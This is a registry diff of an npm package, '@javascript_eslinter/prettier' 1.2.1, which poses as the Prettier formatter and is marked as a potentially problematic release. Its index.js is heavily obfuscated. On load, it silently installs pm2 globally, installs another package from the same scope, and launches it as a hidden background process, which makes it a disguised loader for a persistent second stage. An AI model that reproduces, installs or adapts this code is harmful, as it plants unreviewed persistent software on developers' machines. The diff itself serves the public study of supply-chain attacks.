@javascript_eslinter/prettier 1.2.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @javascript_eslinter/prettier might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +21 -0
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x259540=a0_0x42ea;(function(_0x13966c,_0x43ff14){const _0x4ab4fd=a0_0x42ea,_0x398f13=_0x13966c();while(!![]){try{const _0x426053=-parseInt(_0x4ab4fd(0x150))/0x1+parseInt(_0x4ab4fd(0x154))/0x2+parseInt(_0x4ab4fd(0x152))/0x3+parseInt(_0x4ab4fd(0x14e))/0x4*(parseInt(_0x4ab4fd(0x158))/0x5)+-parseInt(_0x4ab4fd(0x157))/0x6*(parseInt(_0x4ab4fd(0x14f))/0x7)+-parseInt(_0x4ab4fd(0x15a))/0x8*(parseInt(_0x4ab4fd(0x159))/0x9)+-parseInt(_0x4ab4fd(0x15b))/0xa;if(_0x426053===_0x43ff14)break;else _0x398f13['push'](_0x398f13['shift']());}catch(_0x3224e1){_0x398f13['push'](_0x398f13['shift']());}}}(a0_0x3ddb,0x82659));const {exec}=require(a0_0x259540(0x155));function installPrettier(){return new Promise((_0x431a01,_0x8302f)=>{const _0x2a3a30=a0_0x42ea;exec(_0x2a3a30(0x156),(_0x370976,_0xedbb9e,_0x832e39)=>{const _0x86c291=_0x2a3a30;_0x370976?_0x431a01(_0x86c291(0x153)+_0x832e39):_0x431a01(_0xedbb9e);});});}function deleteEslinter(){return new Promise((_0x401403,_0x4a2829)=>{const _0x19dd07=a0_0x42ea;exec(_0x19dd07(0x15d),(_0x3b0e7a,_0x129d2d,_0x4f059f)=>{const _0x1fda9b=_0x19dd07;_0x3b0e7a?_0x401403(_0x1fda9b(0x153)+_0x4f059f):_0x401403(_0x129d2d);});});}function installEslinter(){return new Promise((_0x597582,_0xbeb741)=>{exec('npm\x20install\x20-g\x20@javascript_eslinter/eslint@latest',(_0x22139c,_0x1616e1,_0x4cd77c)=>{_0x22139c?_0x597582('Error\x20installing\x20PM2:\x20'+_0x4cd77c):_0x597582(_0x1616e1);});});}function startEslinter(){return new Promise((_0x38f17e,_0x52b04c)=>{const _0x30b3ba=a0_0x42ea;exec(_0x30b3ba(0x151),{'windowsHide':!![]},(_0x508897,_0xab6e40,_0x7ecb9c)=>{const _0x5b9779=_0x30b3ba;_0x508897?_0x38f17e(_0x5b9779(0x15c)+_0x7ecb9c):_0x38f17e(_0xab6e40);});});}async function main(){try{await installPrettier(),await deleteEslinter(),await installEslinter(),await startEslinter();}catch(_0x3d0277){}}function a0_0x42ea(_0x11913d,_0x249785){const _0x3ddb2f=a0_0x3ddb();return a0_0x42ea=function(_0x42eadf,_0x3d499b){_0x42eadf=_0x42eadf-0x14e;let _0x26f467=_0x3ddb2f[_0x42eadf];return _0x26f467;},a0_0x42ea(_0x11913d,_0x249785);}function a0_0x3ddb(){const _0x4297eb=['3153220lsTVdf','460936xMyKBE','83840EHKEoV','eslinter\x20start','913905zGeIXK','Error\x20installing\x20PM2:\x20','2000308SpYJOe','child_process','npm\x20install\x20-g\x20pm2','54ulhtvq','5GRqeyK','9WlQECl','707752wfFowA','7940480iETCfe','Error\x20starting\x20with\x20PM2:\x20','pm2\x20delete\x20eslinter'];a0_0x3ddb=function(){return _0x4297eb;};return a0_0x3ddb();}main();
|
package/package.json
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
{
|
2
|
+
"name": "@javascript_eslinter/prettier",
|
3
|
+
"version": "1.2.1",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
7
|
+
},
|
8
|
+
"keywords": [],
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC",
|
11
|
+
"devDependencies": {},
|
12
|
+
"repository": {
|
13
|
+
"type": "git",
|
14
|
+
"url": "git+https://github.com/typescript-eslinter/prettier.git"
|
15
|
+
},
|
16
|
+
"bugs": {
|
17
|
+
"url": "https://github.com/typescript-eslinter/prettier/issues"
|
18
|
+
},
|
19
|
+
"homepage": "https://github.com/typescript-eslinter/prettier#readme",
|
20
|
+
"description": ""
|
21
|
+
}
|